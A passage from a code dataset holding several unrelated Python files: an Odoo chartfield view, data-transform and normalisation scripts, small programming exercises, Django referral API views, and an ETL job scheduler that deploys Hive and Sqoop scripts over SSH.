rec.project_id.id)\n if rec.invest_asset_id:\n model, res_id = ('res.invest.asset', rec.invest_asset_id.id)\n if rec.invest_construction_phase_id:\n model, res_id = ('res.invest.construction.phase',\n rec.invest_construction_phase_id.id)\n if rec.personnel_costcenter_id:\n model, res_id = ('res.personnel.costcenter',\n rec.personnel_costcenter_id.id)\n if res_id:\n Chart = self.env['chartfield.view']\n rec.chartfield_id = Chart.search([('model', '=', model),\n ('res_id', '=', res_id)])\n else:\n rec.chartfield_id = False\n\n @api.onchange('chartfield_id')\n def _onchange_chartfield_id(self):\n res_id = self.chartfield_id.res_id\n if self.chartfield_id.model == 'res.section':\n self.section_id = res_id\n if self.chartfield_id.model == 'res.project':\n self.project_id = res_id\n if self.chartfield_id.model == 'res.invest.construction.phase':\n self.invest_construction_phase_id = res_id\n if self.chartfield_id.model == 'res.invest.asset':\n self.invest_asset_id = res_id\n if self.chartfield_id.model == 'res.project':\n self.project_id = res_id\n\n\nclass ChartfieldView(models.Model):\n _name = 'chartfield.view'\n _auto = 
False\n _order = 'seq, code'\n\n seq = fields.Integer(\n string='Sequence',\n )\n type = fields.Selection(\n [('sc:', 'Section'),\n ('pj:', 'Project'),\n ('cp:', 'Construction Phase'),\n ('ia:', 'Invest Asset'),\n ('pc:', 'Personnel'), ],\n string='Type',\n )\n model = fields.Char(\n string='Model',\n )\n id = fields.Integer(\n string='ID',\n )\n res_id = fields.Integer(\n string='Resource ID',\n )\n code = fields.Char(\n string='Code',\n )\n name = fields.Char(\n string='Name',\n )\n name_short = fields.Char(\n string='Short Name',\n )\n costcenter_id = fields.Many2one(\n 'res.costcenter',\n string='Costcenter',\n )\n\n @api.multi\n def name_get(self):\n result = []\n for rec in self:\n name = rec.name\n name_short = ('name_short' in rec) and rec['name_short'] or False\n result.append((rec.id, \"%s%s\" %\n (rec.code and '[' + rec.code + '] ' or '',\n name_short or name or '')))\n return result\n\n def init(self, cr):\n tools.drop_view_if_exists(cr, self._table)\n _sql = \"\"\"\n select * from (\n (select 1 seq, 'sc:' as type, 'res.section' as model,\n id+1000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_section where active=true)\n union all\n (select 2 seq, 'pj:' as type, 'res.project' as model,\n id+2000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_project where active=true)\n union all\n (select 3 seq, 'cp:' as type, 'res.invest.construction.phase' as model,\n p.id+3000000 as id, p.id as res_id, p.code, c.name as name,\n phase as name_short, costcenter_id\n from res_invest_construction_phase p join res_invest_construction c on\n c.id = p.invest_construction_id where p.active=true)\n union all\n (select 4 seq, 'ia:' as type, 'res.invest.asset' as model,\n id+4000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_invest_asset where active=true)\n union all\n (select 5 seq, 'pc:' as type, 'res.personnel.costcenter' as model,\n id+5000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_personnel_costcenter where active=true)\n ) a\n \"\"\"\n cr.execute(\"\"\"CREATE or REPLACE VIEW %s as (%s)\"\"\" %\n (self._table, _sql,))\n","sub_path":"pabi_chartfield_merged/models/chartfield.py","file_name":"chartfield.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"549110645","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Jan 29, 2021\n\n@file: transforms.py\n@desc: Module containing all the transformations that can be done on a datasets.\n@author: laugh12321\n@contact: laugh12321@vip.qq.com\n\"\"\"\nimport abc\nimport numpy as np\nfrom typing import List, Dict\n\nfrom src.model import enums\nfrom src.model.models import rnn_supervised, pixel_based_cnn, \\\n pixel_based_fnnc, pixel_based_dacn\n\n\nclass BaseTransform(abc.ABC):\n @abc.abstractmethod\n def __call__(self, *args, **kwargs):\n \"\"\"\n Each subclass should implement this method.\n :param args: Arbitrary list of arguments.\n :param kwargs: Arbitrary dictionary of arguments.\n \"\"\"\n\n\nclass SpectralTransform(BaseTransform):\n def __init__(self, **kwargs):\n \"\"\"Initializer of the spectral transformation.\"\"\"\n super().__init__()\n\n def __call__(self, samples: np.ndarray,\n labels: np.ndarray) -> List[np.ndarray]:\n \"\"\"\n Transform 1D samples along the spectral axis.\n Only the spectral features are present for each sample in the datasets.\n\n :param samples: Input samples that will undergo 
transformation.\n        :param labels: Class values for each sample.\n        :return: List containing the transformed samples and the class labels.\n        \"\"\"\n        return [np.expand_dims(samples.astype(np.float32), -1), labels]\n\n\nclass MinMaxNormalize(BaseTransform):\n    def __init__(self, min_: float, max_: float):\n        \"\"\"\n        Normalize each sample.\n\n        :param min_: Minimum value of features.\n        :param max_: Maximum value of features.\n        \"\"\"\n        super().__init__()\n        self.min_ = min_\n        self.max_ = max_\n\n    def __call__(self, samples: np.ndarray, labels: np.ndarray) -> List[\n        np.ndarray]:\n        \"\"\"\n        Perform min-max normalization on the passed samples.\n\n        :param samples: Input samples that will undergo normalization.\n        :param labels: Class values for each sample.\n        :return: List containing the normalized samples and the class labels.\n        \"\"\"\n        return [(samples - self.min_) / (self.max_ - self.min_), labels]\n\n\ndef apply_transformations(data: Dict,\n                          transformations: List[BaseTransform]) -> Dict:\n    \"\"\"\n    Apply each transformation from provided list\n\n    :param data: Dictionary with 'data' and 'labels' keys holding np.ndarrays\n    :param transformations: List of transformations\n    :return: Transformed data, in the same format as input\n    \"\"\"\n    for transformation in transformations:\n        data[enums.Dataset.DATA], data[enums.Dataset.LABELS] = transformation(\n            data[enums.Dataset.DATA], data[enums.Dataset.LABELS])\n    return data\n\n\nUNMIXING_TRANSFORMS = {\n    rnn_supervised.__name__: [SpectralTransform],\n\n    pixel_based_cnn.__name__: [SpectralTransform],\n\n    pixel_based_fnnc.__name__: [SpectralTransform],\n\n    pixel_based_dacn.__name__: [SpectralTransform]\n}\n","sub_path":"src/utils/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"497543661","text":"\"\"\"\r\n    Argument syntax:\r\n        python standardized_data.py input.csv --method=method --columns column1 column2 column3 ... 
--output=output.csv\r\n    Example:\r\n        python standardized_data.py house-prices.csv --method=MINMAX --columns ID lotFrontage alley --output=request7.csv\r\n\"\"\"\r\n\r\n# Load the required packages\r\nimport sys\r\nfrom SupportFunction import getDataset,getTypeOfAttributes,list_attributes, standardlized_data_by_MINMAX_Method, standardlized_data_by_ZScore_Method\r\n\r\ninput = sys.argv[1]\r\noutput = sys.argv[len(sys.argv)-1].split(\"=\")[1]\r\nmethod = sys.argv[2].split(\"=\")[1]\r\nmethod = method.lower()\r\n\r\ndataset = getDataset(input)\r\nattributes = list_attributes(dataset)\r\nTypeOfAttribute = getTypeOfAttributes(dataset)\r\ncolumns = []\r\nfor index in range(4,len(sys.argv)-1,1):\r\n    check=False\r\n    for attribute in attributes:\r\n        if (attribute.lower()==sys.argv[index].lower()):\r\n            columns.append(attribute)\r\n            check=True\r\n            break\r\n    if (check==False):\r\n        print(sys.argv[index] + \" is Invalid\")\r\n\r\n# iterate over a copy: removing items from the list being iterated would skip elements\r\nfor col in columns[:]:\r\n    if (TypeOfAttribute[col]>2):\r\n        print(col + \" isn't Numeric\")\r\n        columns.remove(col)\r\n\r\nif (method==\"minmax\"):\r\n    for col in columns:\r\n        standardlized_data_by_MINMAX_Method(dataset,col,1.0,0.0)\r\nelif (method==\"zscore\"):\r\n    for col in columns:\r\n        standardlized_data_by_ZScore_Method(dataset,col)\r\nelse:\r\n    print(\"methods available are MinMax or ZScore\")\r\n    exit(0)\r\ndataset.to_csv(output)","sub_path":"Preprocessing/standardized_data.py","file_name":"standardized_data.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"542022448","text":"\"\"\"\nDefine a simple \"spelling correction\" function correct()\nthat takes a string and sees to it that\n1) two or more occurrences of the space character are compressed into one,\nand 2) inserts an extra space after a period if the period is\ndirectly followed by a letter.\nE.g. correct(\"This is very funny and cool.Indeed!\")\nshould return \"This is very funny and cool. 
Indeed!\"\nTip: Use regular expressions!\n\n\"\"\"\ndef correct(sentence):\n\n new_string=\" \"\n count = 0\n for i in range(len(sentence)):\n\n if sentence[i] != \" \":\n new_string = new_string + sentence[i]\n else:\n count = count +1\n \n","sub_path":"23-Spelling Correction.py","file_name":"23-Spelling Correction.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"159504586","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Referral\nfrom .serializers import ReferralSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n# Create your views here.\n\ndef index(request):\n return HttpResponse(\"Landing page placeholder\")\n\n@api_view(['GET','PUT','DELETE'])\ndef get_delete_update_referral(request, pk):\n\ttry:\n\t\treferral = Referral.objects.get(pk=pk)\n\texcept Referral.DoesNotExist:\n\t\treturn Response(status = status.HTTP_404_NOT_FOUND)\n\t# get single referral\n\tif request.method == 'GET':\n\t\tserializer = ReferralSerializer(referral)\n\t\treturn Response(serializer.data)\n\t# update referral\n\telif request.method == 'PUT':\n\t\tserializer = ReferralSerializer(referral, data=request.data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn Response(serializer.data, status=status.HTTP_204_NO_CONTENT)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\t# delete referral\n\telif request.method == 'DELETE':\n\t\treferral.delete()\n\t\treturn Response(status=status.HTTP_204_NO_CONTENT)\n\n@api_view(['GET', 'POST'])\ndef get_post_referrals(request):\n\t# get all referrals\n\tif request.method == 'GET':\n\t\treferrals = Referral.objects.all()\n\t\tserializer = ReferralSerializer(referrals, many=True)\n\t\treturn Response(serializer.data)\n\t# create new referral\n\telif request.method == 'POST':\n\t\tdata = {\n\t\t\t'title': request.data.get('title'),\n\t\t\t'clicks': 0 if request.data.get('clicks') is None else request.data.get('clicks')\n\t\t}\n\t\tserializer = ReferralSerializer(data=data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn Response(serializer.data, status=status.HTTP_201_CREATED)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\ndef increment_referral_click(request, pk):\n\t# increment referral clicks\n\ttry:\n\t\treferral = Referral.objects.get(pk=pk)\n\texcept Referral.DoesNotExist:\n\t\treturn Response(status = status.HTTP_404_NOT_FOUND)\n\t\n\treferral.clicks += 1\n\treferral.save()\n\treturn Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"referralmanager/referrals/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"325581820","text":"\"\"\" Программа принимает действительное положительное число ​ x и целое отрицательное число\ny. Необходимо выполнить возведение числа ​ x в степень ​ y ​ . Задание необходимо реализовать\nв виде функции ​ my_func(x, y)​ . При решении задания необходимо обойтись без встроенной\nфункции возведения числа в степень.\n\nПодсказка: попробуйте решить задачу двумя способами. 
Первый — возведение в степень с помощью оператора **.\nВторой — более сложная реализация без оператора **, предусматривающая использование цикла.\n\n\"\"\"\n\n\ndef try_type(var, var_type):\n try:\n var_type(var)\n return True\n except ValueError:\n return False\n\n\ndef my_func_pow(x, y):\n res_2 = 1\n for i in range(abs(y) - 1):\n res_2 *= x\n return x**y, res_2 if y >= 0 else 1/res_2\n\n\nwhile True:\n tmp_list = input('Введите два числа через пробел:\\n').split(' ')\n if len(tmp_list) < 2:\n print('Вы ввели недостаточно чисел')\n elif not (try_type(tmp_list[0], int) and try_type(tmp_list[1], int)):\n print('Ошибка при вводе! Введите числа')\n else:\n print(f'Результат: {my_func_pow(int(tmp_list[0]), int(tmp_list[1]))}')\n break\n","sub_path":"lesson_3/quest_4.py","file_name":"quest_4.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"500699290","text":"import os\nimport time\nimport pandas as pd\nfrom cons import conn as conn\nimport confs\nimport pymysql\nfrom ssh import SSH_cmd as ssh_cmd\nfrom ssh import SSH as ssh_con\nmain_path=confs.main_path\nspecia_list=['dim_cust_map'] #特殊依赖表\n\nclass auto_schedule(object):\n def __init__(self,group_num=10,frency='d',tar_ssh='ssh_uat'):\n self.group_num=group_num\n if frency in ['d','w','m']:#d 表示天 w 表示zhou m表示月 \n self.frency=frency\n else:\n print('frency 参数只能是 d(天),w(周),m(月) ')\n raise Exception(\"frency 参数只能是 d(天),w(周),m(月) \") \n self.group_name=frency+'_run_group'\n sshcon=ssh_con()\n self.ssh=ssh_cmd(sshcon.ssh_uat)\n if tar_ssh=='ssh_sc':\n self.ssh=ssh_cmd(sshcon.ssh_sc)\n \n def get_job_group(self): #获取现有的分组情况\n engine=conn.meta('etl_data')\n sql_txt=\"\"\"\n SELECT s.tb_name,s.sql_file,s.group_id,s.freq_type,\n case when s.depend is null then e.cfg_denpend\n when s.depend<>e.cfg_denpend and e.cfg_denpend<>'nan' then e.cfg_denpend\n else s.depend end depend\n FROM job_group_set s \n LEFT JOIN etl_job_set e on s.tb_name=e.tb_name \n and e.oper_date=CURRENT_DATE() and e.job_type='hive'\n where del_flag=0 and freq_type='{0}'\n \"\"\"\n job_group=pd.read_sql(sql_txt.format(self.frency),engine,index_col='tb_name')\n sql_txt=\"\"\"\n SELECT group_id,max(rank_id) max_rank_id\n FROM job_group_set where freq_type='{0}' group by group_id order by group_id\n \"\"\" #,index_col='group_id'\n group_max_rank_id=pd.read_sql(sql_txt.format(self.frency),engine)\n return job_group.to_dict(),group_max_rank_id\n def get_group_usedtime(self): #获取作业用时情况,分组用时情况\n engine=conn.sljr_pg()\n sql_txt=\"\"\"\n select \n case when batch_type='hive' then batch_name||'.sql' else batch_name end batch_name,\n avg(EXTRACT(EPOCH FROM (enddate-begindate))) used_time\n from \n dc_stging.sljr_hive_batch_log \n where create_time>CURRENT_TIMESTAMP - interval '10 day' \n and error='success' \n GROUP BY case when batch_type='hive' then batch_name||'.sql' else batch_name end\n \"\"\"\n job_time=pd.read_sql(sql_txt,engine,index_col='batch_name')\n engine=conn.meta('etl_data')\n sql_txt=\"\"\"\n SELECT tb_name,sql_file,group_id,freq_type,depend\n FROM job_group_set where del_flag=0 and freq_type='{0}'\n \"\"\"\n job_group=pd.read_sql(sql_txt.format(self.frency),engine,index_col='tb_name')\n if job_group.shape[0]>0:\n job_group=job_group.merge(job_time,how='left',left_on='sql_file',right_index=True)\n job_group=job_group.fillna(job_group['used_time'].mean())\n job_group=job_group.groupby('group_id')['used_time'].sum()\n return job_group.to_dict(),job_time.to_dict()['used_time']\n 
else:\n group_used_time={}\n for i in range(self.group_num):\n group_used_time[i+1]=0\n return group_used_time,job_time.to_dict()['used_time'] \n def group_sh(self):\n group_sh={}\n group_sql={}\n for i in range(self.group_num):\n group_file=self.group_name+str(i+1).zfill(2)+'.sh'\n filepath=confs.main_path_bin+group_file\n open(filepath, \"wb\").write(open(confs.main_path+'bin/template.sh', \"rb\").read())\n group_sh[i+1]=group_file\n group_sql[i+1]=[]\n return group_sh, group_sql\n \n def dict_sort_by_value(self,d,desc=False): # 数据字典key值按value排序\n items=d.items() \n backitems=[[v[1],v[0]] for v in items] \n backitems.sort(reverse=desc) #reverse=True\n #print(type(backitems))\n #backitems2=[[v[1],v[0]] for v in backitems] \n return [backitems[i][1] for i in range(0,len(backitems))] \n def re_set_all(self,group_num_new=0): #重置所有分组\n if group_num_new<3:\n print('group_num分组数太少,应该在4组以上')\n return 0\n else:\n self.group_num=group_num_new\n gp_map,gp_sql=self.group_sh()\n jobs_dict,group_max_rank_id=self.get_job_group()\n tb_sql_map=jobs_dict['sql_file']\n tb_dep_map=jobs_dict['depend']\n group_usedtime,sql_usedtime=self.get_group_usedtime()\n has_dep_tbs={}\n tb_gp_map={} #表分组 \n no_dep_tbs={} #特殊表提前执行\n for tb in tb_sql_map.keys():\n depd=eval(tb_dep_map[tb]) #依赖的表\n #tb_dep_map[tb]=depd\n new_depd=depd.copy() #将依赖表另存一份\n for tp in depd: #去除依赖sdd的表\n if tp[0:4] in confs.db_map.keys():\n new_depd.remove(tp)\n if tp in specia_list:\n new_depd.remove(tp)\n if len(new_depd)>0:\n has_dep_tbs[tb]=new_depd\n else :\n if tb in specia_list:\n no_dep_tbs[tb]=0 #特殊表加长时间以便使其放在首位\n else:\n tb_sql=tb_sql_map[tb]\n if tb_sql in sql_usedtime.keys(): #有执行历史记录的以历史用时为准\n no_dep_tbs[tb]=sql_usedtime[tb_sql]\n else:\n no_dep_tbs[tb]=99999\n no_dep_tbs=self.dict_sort_by_value(no_dep_tbs) \n for i in range(len(no_dep_tbs)):\n tp=i%self.group_num+1\n gp_sql[tp].append(no_dep_tbs[i])\n tb_gp_map[no_dep_tbs[i]]=tp\n for tb in has_dep_tbs.keys():\n max_num=0\n for tp in has_dep_tbs[tb]:\n if tp in tb_gp_map.keys():\n tp_max_num=tb_gp_map[tp]\n if tp_max_num>max_num:\n max_num=tp_max_num\n else :\n print(tp,'依赖表没有加入配置')\n return 0\n if max_num>0:\n if tb in tb_gp_map.keys():\n print(tb,'已经存在')\n return 0\n else:\n gp_sql[max_num].append(tb)\n tb_gp_map[tb]=max_num\n etl_data=conn.meta('etl_data')\n sql=\"\"\"insert into job_group_set_his(tb_name,sql_file,group_id,depend,rank_id,create_time,update_time,freq_type,del_flag,cmds,oper_time)\n select tb_name,sql_file,group_id,depend,rank_id,create_time,update_time,freq_type,del_flag,cmds,CURRENT_TIMESTAMP() from job_group_set;\n delete from job_group_set where freq_type='{0}';\"\"\"\n etl_data.execute(sql.format(self.frency))\n sql=\"insert into job_group_set(tb_name,sql_file,depend,freq_type,group_id,rank_id,cmds) VALUES('{0}','{1}','{2}','{3}',{4},{5},'{6}')\"\n for tb in gp_sql.keys():\n tb_list=gp_sql[tb]\n for i in range(len(tb_list)):\n etl_data.execute(sql.format(tb_list[i],tb_sql_map[tb_list[i]],pymysql.escape_string(str(tb_dep_map[tb_list[i]])),self.frency,tb,i,confs.hive_sh+tb_sql_map[tb_list[i]]))\n return 1\n \n def del_job(self,tb_name): # 删除作业\n jobs_dict,group_max_rank_id=self.get_job_group()\n tb_dep_map=jobs_dict['depend']\n tb_sql_map=jobs_dict['sql_file']\n if tb_name in tb_sql_map.keys():\n sql_file=tb_sql_map[tb_name]\n for tp in tb_dep_map.keys():\n if tb_name in tb_dep_map[tp]:\n print(tp,'依赖',tb_name,'不能删除')\n return 0\n sql=\"update job_group_set set del_flag=1 where sql_file='{0}' and freq_type='{1}';\".format(sql_file,self.frency)\n 
etl_data=conn.meta('etl_data')\n etl_data.execute(sql)\n self.write_sh()\n return 1\n else:\n print(tb_name,'没有部署,无法删除')\n return 0\n def add_job(self,sql_file,tb_name,depd_list): # 新增作业\n group_usedtime,sql_usedtime=self.get_group_usedtime()\n jobs_dict,group_max_rank_id=self.get_job_group() # 已经配置好的\n #print(group_max_rank_id)\n tb_group_map=jobs_dict['group_id']\n tb_dep_map=jobs_dict['depend']\n if tb_name in tb_dep_map or sql_file in jobs_dict['sql_file'].keys():\n print(tb_name,'已经部署,不能不能重复部署')\n return 0\n else:\n new_depd=depd_list.copy() #将依赖表另存一份\n for tp in depd_list: #去除依赖sdd的表\n if tp[0:4] in confs.db_map.keys():\n new_depd.remove(tp)\n if tp in specia_list:\n new_depd.remove(tp)\n if len(new_depd)>0: #有依赖\n dep_group={}\n for tb in new_depd:\n if tb in tb_group_map.keys():\n group_id=tb_group_map[tb]\n dep_group[group_id]=group_usedtime[group_id]\n else:\n print(tb,'依赖表没有加入配置')\n return 0\n group_id=self.dict_sort_by_value(dep_group)[0] \n #rank_id=group_max_rank_id.loc[group_id-1,'max_rank_id']+1 \n else: #无依赖\n group_id=self.dict_sort_by_value(group_usedtime)[0]\n rank_id=group_max_rank_id.loc[group_id-1,'max_rank_id']+1\n sql=\"insert into job_group_set(tb_name,sql_file,depend,freq_type,group_id,rank_id,cmds) VALUES('{0}','{1}','{2}','{3}',{4},{5},'{6}')\"\n etl_data=conn.meta('etl_data')\n etl_data.execute(sql.format(tb_name,sql_file,pymysql.escape_string(str(depd_list)),self.frency,group_id,rank_id,confs.hive_sh+sql_file))\n return 1\n def write_sh(self,group_id=0): #指定groupid则只更新group_id的分组\n engine=conn.meta('etl_data')\n sshcon=ssh_con()\n ssh_uat=ssh_cmd(sshcon.ssh_uat)\n ssh_sc=ssh_cmd(sshcon.ssh_sc)\n sql_txt=\"\"\"\n SELECT group_id,sql_file,cmds\n FROM job_group_set where del_flag=0 and freq_type='{0}'\n order by group_id,rank_id\n \"\"\"\n job_group=pd.read_sql(sql_txt.format(self.frency),engine)\n #if group_id<1 or group_id>self.group_num: \n gp_map,gp_sql=self.group_sh() #将文件清空\n for i in gp_map.keys():\n filepath=confs.main_path_bin+gp_map[i]\n f=open(filepath, 'a',encoding='utf-8') #打开文件\n tp=list(job_group[job_group['group_id']==i]['cmds'])\n for sqls in tp:\n f.write(sqls)\n f.write(\"\\n\")\n f.close()\n ssh_uat.upload(filepath,confs.remote_path_bin+gp_map[i])\n ssh_sc.upload(filepath,confs.remote_path_bin+gp_map[i])\n ssh_uat.cmd_run(['chmod 755 -R /home/bigdata/bin /home/bigdata/sql /home/bigdata/cfg'])\n ssh_sc.cmd_run(['chmod 755 -R /home/bigdata/bin /home/bigdata/sql /home/bigdata/cfg'])\n ssh_uat.close()\n ssh_sc.close()\n return 1\n def is_utf8_file(self,filepath): #是否utf8,但是有bom和无bom无法区别\n try:\n f=open(filepath,'r',encoding='utf-8')\n f.read()\n f.close()\n return 1\n except Exception as e:\n f.close()\n return 0\n def read_deploy(self):\n #判断表存在、文件存在、依赖、是否sqoop判断\n filepath=confs.main_path+'deploy_file.properties'\n tb_list=set()\n with open(filepath, 'r') as f:\n lines = f.readlines() #读取所有行\n for line in lines:\n tp=line.replace('.sql','').replace('.sh','').replace('.properties','').replace(',','')\n if len(tp)>4:\n tb_list.add(tp.strip())\n f.close()\n #print(tb_list)\n return list(tb_list)\n \n def check_deploy(self,tb): #文件检测\n if not os.path.exists(confs.main_path+'sql/'+tb+'.sql'):\n print(tb+'.sql','文件不存在')\n return 0,'null','null'\n else:\n sql_tb,sql_tb_cn,sql_author=self.read_sqlfile(tb+'.sql')\n if self.is_utf8_file(confs.main_path+'sql/'+tb+'.sql')==0:\n print(tb+'.sql','不是UTF-8格式')\n return 0,'null','null'\n if os.path.exists(confs.main_path+'cfg/'+tb+'.properties'):\n if 
self.is_utf8_file(confs.main_path+'cfg/'+tb+'.properties')==0:\n print(tb+'.properties','不是UTF-8格式')\n return 0,'null','null'\n keys=''\n values=[]\n with open(confs.main_path+'cfg/'+tb+'.properties', 'r',encoding='utf-8') as f: #打开文件\n lines = f.readlines() #读取所有行\n file_rs={}\n for line in lines:\n line=line.strip()\n if len(line)>1 and not line.startswith('#'):\n if '[' in line:\n if len(keys)>1:\n file_rs[keys]=values\n keys=line\n values=[]\n else:\n if line not in['@DAILY']:\n values.append(line)\n #print(file_rs['[results]'])\n if len(file_rs['[results]'])==1:\n tar_tb=file_rs['[results]'][0]\n if conn.hive_tb_exists(tar_tb)==0:\n print('hive不存目标表:',tar_tb)\n #return 0,'null'\n if not tar_tb==sql_tb:\n print('properties文件【result】表名称和目标表不一致',tar_tb,sql_tb)\n return 0,'null','null'\n else:\n print('properties文件【result】没有指定生成结果文件名或者指定多个结果')\n return 0,'null'\n if len(file_rs['[dependence]'])>0:\n for tp in file_rs['[dependence]']:\n #检查依赖表的配置情况\n if conn.etl_set_exists(tp)==0:\n print(tp,'依赖配置没有加入调度')\n return 0,'null','null'\n #print(tp)\n else:\n print('properties文件【dependcy】没有指定依赖文件') \n return 0,'null','null'\n if len(file_rs['[properties]'])>0:\n for tp in file_rs['[properties]']:\n if 'dev' in tp:\n print('dev不应该出现在配置文件的[properties]中')\n return 0,'null','null'\n else:\n print('properties文件【properties】配置正确') \n return 0,'null','null'\n else:\n print(tb+'.properties','文件不存在')\n return 0,'null','null'\n return 1,tar_tb,file_rs['[dependence]']\n \n def read_sqlfile(self,file_name):\n filepath=confs.main_path_sql+file_name\n target_tb_cn=''\n target_tb=''\n create_by=''\n if os.path.exists(filepath):\n try:\n #print(files)\n if os.path.isfile(filepath) and file_name.endswith('.sql'):\n with open(filepath, 'r',encoding='utf-8') as f: #打开文件\n lines = f.readlines() #读取所有行\n target_tb_cn=''\n create_by=''\n for line in lines[0:15]:\n line=line.strip()\n if 'see:' in line:\n target_tb_cn=line[line.find(':')+1:].strip()\n if '}.' 
in line:\n target_tb=line[line.find('}.')+2:].strip()\n target_tb=target_tb.replace('(','').replace(' ','')\n if 'author:' in line:\n create_by=line[line.find(':')+1:].strip()\n #tables_list.loc[nums]=[files,target_tb_cn,create_by]\n except Exception as e:\n #print('str(Exception):\\t', str(Exception))\n print (file_name,'\\t error :\\t\\t',str(e)) \n return target_tb,target_tb_cn,create_by\n else:\n print(file_name,'文件不存在') \n return target_tb,target_tb_cn,create_by \n def sdd_table(self,db,tb_list):#uat和生产环境同步建SDD表\n sshcon=ssh_con()\n ssh=ssh_cmd(sshcon.ssh_uat)\n is_success=ssh.hive_ddl(db,tb_list)\n if is_success>0:\n ssh=ssh_cmd(sshcon.ssh_sc)\n ssh.hive_ddl(db,tb_list)\n ssh.close() \n def append_sh(self,filepath,tar_cmd):\n if filepath.endswith('.sh') :\n if not os.path.exists(filepath):\n #print(confs.main_path+'bin/template.sh',os.path.exists(confs.main_path+'bin/template.sh'))\n open(filepath, \"wb\").write(open(confs.main_path+'bin/template.sh', \"rb\").read())\n with open(filepath, 'r',encoding='utf-8') as fr:\n for tp in fr.readlines():\n if tar_cmd in tp:\n print('分组文件已经添加shell命令不能重复配置')\n return 1\n fr.close()\n with open(filepath, 'a',encoding='utf-8') as f: #打开文件\n f.write(tar_cmd)\n f.write(\"\\n\")\n f.close()\n \n with open(filepath, 'r',encoding='utf-8') as fr:\n for tp in fr.readlines():\n if tar_cmd.endswith('.sql'):\n if len(tp)>160:\n print(filepath,'文件配置错位')\n return 0\n else:\n if len(tp)>100:\n print(filepath,'文件配置错位')\n return 0\n fr.close()\n else:\n print('无效文件,必须是.sh文件') \n return 1 \n def auto_deploy(self,tar_ssh='ssh_uat'): \n tb_list=self.read_deploy()\n print(tb_list)\n sshcon=ssh_con()\n #ssh=ssh_cmd(sshcon.ssh_uat)\n if tar_ssh=='ssh_sc':\n self.ssh=ssh_cmd(sshcon.ssh_sc)\n ssh=self.ssh\n for tb in tb_list:\n heads=tb[0:4]\n if heads in confs.db_map.keys():\n print('\\n sqoop同步配置:',tb)\n tp_tb=tb[5:]\n tar_cmd=heads+' '+tp_tb+' auto'\n tb_size=conn.sljr_tb_size(db=heads,tb=tp_tb)\n if conn.etl_set_exists(tb)>0:\n print(tb,'目标表已经加入了调度,如果需要重新调度请手动修改')\n break\n if tb_size<0:\n print(tp_tb,'表不存在不能同步,或者检查表名')\n break\n if tb_size>10000000:\n print(tp_tb,'大于1千万需要增量同步:',tb_size)\n tar_cmd=tar_cmd+' inc'\n if conn.hive_tb_exists(tb)==0:\n self.sdd_table(db=heads,tb_list=[tp_tb]) #同步表结构\n group_sh=confs.local_path+'bin/sqoop_'+heads+'.sh'\n tar_cmd=confs.sqoop_sh+tar_cmd\n if self.append_sh(group_sh,tar_cmd)>0: \n if ssh.cmd_run([tar_cmd])>0:\n ssh.upload(group_sh,confs.remote_path+'bin/sqoop_'+heads+'.sh')\n else:\n print(heads,'shell文件配置错位')\n break\n else:\n #hive sql配置\n print('\\n hive sql同步配置检测:',tb)\n flag,tar_tb,depd_list=self.check_deploy(tb)\n if flag==0:\n print('\\033[1;37;45m ERROR:',tb,' 配置文件检查错误 \\033[0m')\n break\n else:\n print('检测通过:',tb)\n ssh.upload(confs.main_path+'cfg/'+tb+'.properties',confs.remote_path+'cfg/'+tb+'.properties')\n ssh.upload(confs.main_path+'sql/'+tb+'.sql',confs.remote_path+'sql/'+tb+'.sql')\n #ssh.upload(confs.main_path+'bin/'+tb+'.sh',confs.remote_path+'bin/'+tb+'.sh')\n tar_cmd=confs.hive_sh+tb+'.sql'\n #print('执行数据同步完成')\n if ssh.cmd_run([tar_cmd])>0:\n if self.add_job(tb+'.sql',tar_tb,depd_list)>0:\n self.write_sh()\n else:\n #self.write_sh()\n print('\\033[1;37;45m ERROR:',tb,' sql执行错误,请修改 \\033[0m')\n\n ssh.cmd_run(['chmod 755 -R /home/bigdata/bin /home/bigdata/sql /home/bigdata/cfg'])\n ssh.close()\n def run_sql(self,tb,tar_ssh='ssh_uat'): \n sshcon=ssh_con()\n ssh=ssh_cmd(sshcon.ssh_uat)\n if tar_ssh=='ssh_sc':\n ssh=ssh_cmd(sshcon.ssh_sc)\n flag,tar_tb,depd_list=self.check_deploy(tb)\n if flag==0:\n 
